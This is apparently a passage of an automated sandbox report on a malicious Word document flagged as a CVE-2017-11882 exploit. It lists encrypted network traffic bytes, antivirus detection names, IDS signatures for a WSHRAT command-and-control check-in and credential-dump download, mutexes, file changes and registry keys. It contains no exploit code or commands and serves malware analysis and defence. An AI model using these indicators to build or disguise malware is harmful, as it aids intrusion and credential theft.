  636.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xbd\\xe4\\xc4#\\xb54\\x10\\xff\\x06\\x81{\\xca+\\xcbtb\n\\x8a\\x8d\\xf6w\\xfe\\x89\\x95`\\xa4\\x8b\\xa3\\x9a\\xc4\\xcf\\xe6\\xado\\xcc-\\x9fd\\xebc\\xae\\x0f\\xbf\\x8f]a\\xe7\\xe3/wv\\xc7\\x8b\\xb4\\x86\\xcc\\xe9f\\x8f\\x8a\\xfb\\xbd\\xac\\xdfw=\\x89\\x18\\x06\\x1e\\x8d\n\\xa8\\xfc\\xd4w\\xb0m)7\\xca\\xa5\\xa1\t3\\xf3\\x16y+\\xba\\xe2,ot<\\xe1{\\xdf\\xf7n\\xdf\\xc5f\\xb7@\\xe7t\\x08\\x147\\xc5^t)~\\xc0\\xc7\\x02y>\\x8f\\xe9\\xa3\\xc5\\xd1ep\\x9a/\\xe1\\xe3\\xf2\\xa0\\xdb\\xe9\\xff\\x11\\x86c\\x11\\xf8vk&\\xb4\\xcb5\\x1f3\\xc1m\\x17z\\x85>\\xf7\\xden\\xcb\\xd4n(\\xa7\\x9art\\xd6\\x87\\x91\\x18\\xeb\\xc4\\xe4\\xfb\\x1ep\\x89\\xe9\\x9c\\x99\\xc4\\xb2:]\\xe4q\\xcd\\x8ds\\x97\\xc4\\xff\\xa8\\xec\\xf3\\xb3\\xc08\\xf8\\xbe\\xc4\\x00\\x99\\xacm\\xc57\\x89\\x8b\\xf6a\\x9a\\xf6\\xf7\\xac(:\\x97\\xc8p\\xdds\\xef\\x11\\xc4r2\\xb0\\x15\\xb9\\xddp=\\xe4n\\xb1\\xd7|\\x80\\x81nx|\\x04\\xc6\\xec\\x10\\xdck\\xbc*"
  637.             },
  638.             {
  639.                 "http_request": "winword.exe_WSASend_\\x98\\xe2\\x97\\x0f\\xb8b\\x99\\x0f\\xf7\\x8a\\x05\\xba\\xf4o\\x07!\\x83| ?\\x03\\xa2\\xfa\"\\x1e\\xee\\xd7j\\xcf\\xf8\\x8d\\xf1\\x91\\xd2\\xb9\\xca\\x8c\\xefb\\xc3u\\x82<ex?\\x8c/\\x8e\\xfe\n\\xfc\"\\xb9\\x9df}\\xda\\x99\\x07\\xa0\\xf9%\\x85\\x01y#\\x0bi\\xe7c:\\x00=\\xda\\xfb\\xf4\\x10\\xaa\\xc1\\xf5y\\x1e\\x91\\xd3\"ud\\x84\\xaf\\x98\\x1a\\x03\\xfb\\xdbq\\x96\\xd1\\x06\\x04\\xbap\\xed\\xbf_\\xecj\\xe6/\\xef\\xdb\\xc4\\xdc\\xf7k\\x02\\xcap\\xe2\\x1bffh\\xf7\\xe8o\\xbb\\xf1\\xa6\\x8f\\x7f\\xbb>\\xf2-\\xce\\xf6f\\x16\\x7f\ro\\x15\\xe4d\\x17\\x1e\\x96\\xdac\\xe6\\x8b\\xadt\\xb0\\xe2c\\xc7\\x88d\\xbf\\x1b\\xb4\\xad\\x0f\\x95\\x94\\x00\\xe5\\xc9g\\x9f\\x9f\\x95\\xe8;\\x1c\\x96\\xca\\xb0\\xc1\\x92\\xb2\\xbb\\x169\\x9a\\x06.\\xd1\\x7f\\xe6\\xdb\\x8c\\x96\\xfc\\xba\\x15c'\\x99u\\xe0\\xfb\\x18\\x83\\x02\\xda\\x02\\xeaz\\x83\\xbae\\xa3f\\xf6\\xc3~\\xa6,\\x11^w0\\x90\\x1f1\\x10\\xbf\\x9b\\xdc%\\x92\\x80\\x00\\xa8e\\xdd\\x8e<\\xb5\\xbe\\xe5\\xa5\\xcam\\xb6\\xbd\\x0e7\\xb5\\x99r\\x18\r"
  640.             },
  641.             {
  642.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010]\\xab\\x87\\xd1ji\\xf8\\x04\\xfcu\\xd5\\x91\\x02\\x8f1[\\xc6g~\\xcf\\xcc\\xfa\\xa3\\xbd*\\xc0*!zo\\xee\\xf4\\x91>\\x15x\\xd8:\r*\\xf5\\xc5\\x85\\xf8\\xbd\\x0e\\x9f\\x93\\x99j\\x84\\xaf\\xdff\\x8e\\xe0\\x8d\\xd4\\xc7\\x88 *f\\xd31\\x9b\\x9a<\\xb7\\xfbh\\x05\\x98\\x85\\xd6\\xfbd,\\x0b\\xc3\\xde\\xba\\x15\\x01\\xfb\\xbc\\xe1mu\\xbf\\x1c\\xf2\\x8b\\x14\\x9e\\xd6hts\\xcd\\xdap~\\x14\\xf3w\\x85\tdl\\x94\\xd7m\\xd8\\xad\\x95c\\xc5s\\xa4\\xed\\x0b\\x9d\\xce\\xf2j\\xa5+xrv7w&~\\xb8\\x00\\xf9:\\x8b\\xee\\x18\\x93\\x9f\\xa6\\xd8c\\x13\\x8f\\xc2\\xe8\\xed\\xb6l\\xd3xv\\x8b~\\x9fd\\xed\\x81 \\xc0z\\xc1\\xc3\\xbf_\\xa1\\xdb2\\xf3\\x9ft\\xc1\\xf3\\x15\\x83\\x131mov\\xfa\\x97\\xafs\\xa32\\x1a\\xab*\\x1a\\x02;!l&s2&\r\\xbd\\x10)\\xf5\\xe6\\xbf\\xab\\x91\\x8di\\xbcz\\xa6\\xd7\\xd9\"}\\xb9j*\\xfe\\x1f\\x8b-=pc\\x0b\\xce\\xc5\\xbb\\\\x8a?m\\xa5i\\x045\\xb2\\x85\\xd9\\xda\\xc66-\\xdd"
  643.             },
  644.             {
  645.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010k\\xde\\xb3if\\xd8\\x1cn\\xfc\\x800s\\xc4\\xber\\x04-\\xf0\\xb9jv\\x8b\\/iy\\xa7\\x14=\\xfb?k}*\\xe7\\xe3g\n\\xfc\\x99>j\\xab\\xcfp8\\xa9\\xf0v\\x88\\xea\\xa9\\x88\\xfefo\\x1a\\xd7y&\\xc1h\\xd5b\\x16\\x06\\xac\\xd5\\xd3\\x92}\np(\\xfcgg\\x7f\\x9a\\x1bw\\xc5\"\\x12i\\xd1?\\x85\\x84\\x1d\\xa8\\x1b8\\x87\\xcf/\\xdf_y\\xe9s\\xdeoz\\xa1\\xa2n|\\xa1y\\x9c\\x8a\\x91\\x90y\\x98a\\xdc\\xef\\xf7a\\xb5\\x9f\\xae\\xb9\\xcf\\x0bo\\x94\\x0c\t\\xa8w_8sm\\xe3\\x16\\xa7\\x1d\\x1a5n\\x8e'/\\xee\\x14\\xa7@e\\xb4\\xffe\\xf0s\\xdf\\xcc\\x00\\x1e\\xdcl\\x88\\xf1s\\xa2\tu\\x9f3\\xc1\\xc4\\xca^\\xd6\\xcab^\\xab5\\xf5%<6d\\xe3j\\xaa\\xeb\\xc0`\\xe8\\xac\\x86]dz\\x8e\\x81ao\\xf4.\\xa7\\xa1\\x97v\\x85|\\xa02\\xac\\x8bx\\x85\\xd8\\x8fl\\xc3\\xef\\xc9e\\x1e\\xc9\\xa2\\x98\\xb8\\xc7\\xf3\\x817\\xf2y\\xbc\\xd4g\\xb4\\xa7\\xf1\\x8f'\\x05\\xbe\\xc4i\\xf8u\\xee\\xa7\\xa8"
  646.             },
  647.             {
  648.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x18k\\xf4e$\\xbd\\x1c\\x86>\\x81\\xd6\\xf9\\x05\\x8f@\\x8d{\\x83\\x85\\xd0\\xe1\\xe0\\xccc\\xac3\\xfdp\\x1ap\\xeb\\xcf\\xb0\\x0e\\xca\\x14\\xa6\\x08\\x85\\x9b\\x84:b\\xe0\\x9at\\x14s\ny\\x89\\xe4e>u\\xc7\\xc9};\\x83wl\\x82.\\xb8-\\xc7?\\x13j\\x1a*%\\xef\\x037\\x1c\\xc9>rp\\xb3\\x19a\\xf8\\xb0r\\xba\\x06}\\xb1w\\x91\\xe5\\x15\\xc7\\x9c\\xf6k\\xf8\\x88\\xcbdc.\\x1clc\\xaae\\xa1j95\\xa5\\xde\\xafk\\x9a\\xef\\xe7~\\xae*'\\xa5r\\x88k?\\xa9\\xe7\\x12e'\\xe9\\xf2\\x1f'\\x16h\\xf7\\x13\\x93o\\xafa\\x1dx8\\xc4\\xd8\\xa1}q\\x0e\\xc0{\\xe0\\xd1(\\x88\\xb0\\xb13&\\xa0=+\\x01yyy:\\x179\\x8b\\xfb\\x9a\\xa5\\x16\\x914\\x1a\\x96hv(\\x82gy6\\xd2\\xce\\xc7\\xa1\\xf0\\xcb-\\x85n\\xdd\\xc2o\\xd4\\x96\\xcbo\\xd0\\x1fq*\r\\x07a\\x94\\xf3\\xea\\xc4\\xa8\\x1c\\x07\\x86\\xc1\\x81\\xcc;y\\x03\\x15\\xcb\\x90^nf\\xdb\\x0cd9\\xe8\\x1d\\xcc\\x04\\xee_\\x07%\\x87\\xbapw"
  649.             }
  650.         ]
  651.     },
  652.     {
  653.         "Description": "File has been identified by 30 Antiviruses on VirusTotal as malicious",
  654.         "Details": [
  655.             {
  656.                 "MicroWorld-eScan": "Exploit.RTF-ObfsStrm.Gen"
  657.             },
  658.             {
  659.                 "CAT-QuickHeal": "Exp.RTF.Obfus.Gen"
  660.             },
  661.             {
  662.                 "McAfee": "Exploit-CVE2017-11882.ah"
  663.             },
  664.             {
  665.                 "Symantec": "Exp.CVE-2017-11882"
  666.             },
  667.             {
  668.                 "ESET-NOD32": "probably a variant of Win32/Exploit.CVE-2017-11882.A"
  669.             },
  670.             {
  671.                 "GData": "Exploit.RTF-ObfsStrm.Gen"
  672.             },
  673.             {
  674.                 "Kaspersky": "HEUR:Exploit.MSOffice.Generic"
  675.             },
  676.             {
  677.                 "BitDefender": "Exploit.RTF-ObfsStrm.Gen"
  678.             },
  679.             {
  680.                 "Tencent": "Office.Exploit.Generic.Cqz"
  681.             },
  682.             {
  683.                 "Ad-Aware": "Exploit.RTF-ObfsStrm.Gen"
  684.             },
  685.             {
  686.                 "Sophos": "Exp/201711882-P"
  687.             },
  688.             {
  689.                 "Comodo": "Exploit.W97M.CVE2017-11882.AG@843jmy"
  690.             },
  691.             {
  692.                 "F-Secure": "Heuristic.HEUR/Rtf.Malformed"
  693.             },
  694.             {
  695.                 "DrWeb": "Exploit.Rtf.CVE2012-0158"
  696.             },
  697.             {
  698.                 "McAfee-GW-Edition": "Exploit-CVE2017-11882.ah"
  699.             },
  700.             {
  701.                 "FireEye": "Exploit.RTF-ObfsStrm.Gen"
  702.             },
  703.             {
  704.                 "Emsisoft": "Exploit.RTF-ObfsStrm.Gen (B)"
  705.             },
  706.             {
  707.                 "Cyren": "CVE-2017-11882!Camelot"
  708.             },
  709.             {
  710.                 "Avira": "HEUR/Rtf.Malformed"
  711.             },
  712.             {
  713.                 "MAX": "malware (ai score=100)"
  714.             },
  715.             {
  716.                 "Antiy-AVL": "Trojan[Exploit]/OLE.CVE-2017-11882"
  717.             },
  718.             {
  719.                 "Arcabit": "Exploit.RTF-ObfsStrm.Gen"
  720.             },
  721.             {
  722.                 "ZoneAlarm": "HEUR:Exploit.RTF.CVE-2017-11882.gen"
  723.             },
  724.             {
  725.                 "Microsoft": "Exploit:O97M/CVE-2017-11882.T"
  726.             },
  727.             {
  728.                 "AhnLab-V3": "RTF/Malform-C.Gen"
  729.             },
  730.             {
  731.                 "TACHYON": "Trojan-Exploit/RTF.CVE-2017-11882"
  732.             },
  733.             {
  734.                 "Zoner": "Probably RTFObfuscation"
  735.             },
  736.             {
  737.                 "Rising": "Exploit.CVE-2017-11882/SLT!1.AEE3 (CLASSIC)"
  738.             },
  739.             {
  740.                 "Ikarus": "Exploit.CVE-2017-11882"
  741.             },
  742.             {
  743.                 "Qihoo-360": "susp.rtf.objupdate.gen"
  744.             }
  745.         ]
  746.     },
  747.     {
  748.         "Description": "Created network traffic indicative of malicious activity",
  749.         "Details": [
  750.             {
  751.                 "signature": "ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm Checkin 1"
  752.             },
  753.             {
  754.                 "signature": "ET TROJAN WSHRAT CnC Checkin"
  755.             },
  756.             {
  757.                 "signature": "ET TROJAN WSHRAT Credential Dump Module Download Command Inbound"
  758.             }
  759.         ]
  760.     }
  761. ]
  762.  
  763. [*] Started Service: [
  764.     "osppsvc"
  765. ]
  766.  
  767. [*] Executed Commands: []
  768.  
  769. [*] Mutexes: [
  770.     "Local\\2BF388D5-6F8C-40A0-A7EE-996D005C4E14_Office15",
  771.     "Global\\MTX_MSO_Formal1_S-1-5-21-0000000000-0000000000-0000000000-1000",
  772.     "Global\\MTX_MSO_AdHoc1_S-1-5-21-0000000000-0000000000-0000000000-1000",
  773.     "5CAC3FAB-87F0-4750-984D-D50144543427-VER15",
  774.     "CicLoadWinStaWinSta0",
  775.     "Local\\MSCTF.CtfMonitorInstMutexDefault1",
  776.     "Global\\MsoShellExtRegAccess_S-1-5-21-0000000000-0000000000-0000000000-1000",
  777.     "Global\\552FFA80-3393-423d-8671-7BA046BB5906"
  778. ]
  779.  
  780. [*] Modified Files: [
  781.     "C:\\Users\\user\\AppData\\Local\\Temp\\Docs_0251b22f858fcc0ced62b34fdbda70c9.doc",
  782.     "C:\\Users\\user\\AppData\\Local\\Temp\\~$cs_0251b22f858fcc0ced62b34fdbda70c9.doc",
  783.     "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRF{6803CE82-76EB-4C87-9FDF-69844F04E19D}.tmp",
  784.     "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRS{75AF03CA-21B9-4BDA-889C-F6324DD5FD53}.tmp",
  785.     "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRS{04F12CB0-6C70-47A1-852F-DDEF75179D8F}.tmp",
  786.     "C:\\Users\\user\\AppData\\Local\\Microsoft\\Office\\15.0\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=10",
  787.     "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4",
  788.     "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4",
  789.     "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\37D958F0157C4E87D39A5E7FAB3AECCC_090773D7F9DBE1D85BCB60985361F32E",
  790.     "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\37D958F0157C4E87D39A5E7FAB3AECCC_090773D7F9DBE1D85BCB60985361F32E",
  791.     "C:\\Users\\user\\AppData\\Local\\Temp\\Cab1A1B.tmp",
  792.     "C:\\Users\\user\\AppData\\Local\\Temp\\Tar1A1C.tmp",
  793.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab5040.tmp",
  794.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab5041.tmp",
  795.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab5294.tmp",
  796.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab5796.tmp",
  797.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab57B6.tmp",
  798.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab57CA.tmp",
  799.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab5943.tmp",
  800.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab57C8.tmp",
  801.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab57CB.tmp",
  802.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab57B7.tmp",
  803.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab57C9.tmp",
  804.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab5B3A.tmp",
  805.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab5954.tmp",
  806.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab5B4B.tmp",
  807.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab59F1.tmp",
  808.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab5D01.tmp",
  809.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab5D02.tmp",
  810.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab5D13.tmp",
  811.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab60CD.tmp",
  812.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab61A9.tmp",
  813.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab66DA.tmp",
  814.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab7225.tmp",
  815.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab766D.tmp",
  816.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab771A.tmp",
  817.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab7236.tmp",
  818.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab795E.tmp",
  819.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab795D.tmp",
  820.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab7E60.tmp",
  821.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab8130.tmp",
  822.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab821B.tmp",
  823.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab821C.tmp",
  824.     "C:\\Users\\user\\AppData\\Local\\Temp\\cab821D.tmp"
  825. ]
  826.  
  827. [*] Deleted Files: [
  828.     "C:\\Users\\user\\AppData\\Local\\Microsoft\\Schemas\\MS Word_restart.xml",
  829.     "C:\\Users\\user\\AppData\\Local\\Temp\\Cab1A1B.tmp",
  830.     "C:\\Users\\user\\AppData\\Local\\Temp\\Tar1A1C.tmp",
  831.     "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\"
  832. ]
  833.  
  834. [*] Modified Registry Keys: [
  835.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\kqf",
  836.     "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2E\\52C64B7E\\LanguageList",
  837.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache",
  838.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\RemoteClearDate",
  839.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1",
  840.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\Last",
  841.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0",
  842.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0\\FilePath",
  843.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0\\StartDate",
  844.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0\\EndDate",
  845.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0\\Properties",
  846.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0\\Url",
  847.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\LastClean",
  848.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\Trusted Documents\\LastPurgeTime",
  849.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ReviewCycle",
  850.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ReviewCycle\\ReviewToken",
  851.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\CacheReady",
  852.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastRequest",
  853.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery",
  854.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery\\14452A9",
  855.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery\\14452A9\\14452A9",
  856.     "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005119110000000000000000F01FEC\\Usage\\OUTLOOKFiles",
  857.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\Common\\Cloud Storage",
  858.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ForceCacheRefresh",
  859.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OnceSucceeded",
  860.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastUpdate",
  861.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\NextUpdate",
  862.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT",
  863.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Capabilities",
  864.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ConnectMechanism",
  865.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\IsManaged",
  866.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\IsRemovable",
  867.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ServiceOwner",
  868.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\SortOrder",
  869.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\SupportsMultiple",
  870.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\CapabilitiesMetadata",
  871.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Description",
  872.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Name",
  873.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ServiceId",
  874.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ServiceUrl",
  875.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Metadata",
  876.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Metadata\\KeyTip",
  877.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Metadata\\Type",
  878.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails",
  879.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails\\Url16x16",
  880.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails\\Url32x32",
  881.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails\\Url48x48",
  882.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP",
  883.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Capabilities",
  884.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ConnectMechanism",
  885.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\IsManaged",
  886.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\IsRemovable",
  887.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ServiceOwner",
  888.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\SortOrder",
  889.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\SupportsMultiple",
  890.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\CapabilitiesMetadata",
  891.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Description",
  892.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Name",
  893.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ServiceId",
  894.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ServiceUrl",
  895.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Metadata",
  896.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Metadata\\KeyTip",
  897.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Metadata\\Type",
  898.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails",
  899.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails\\Url16x16",
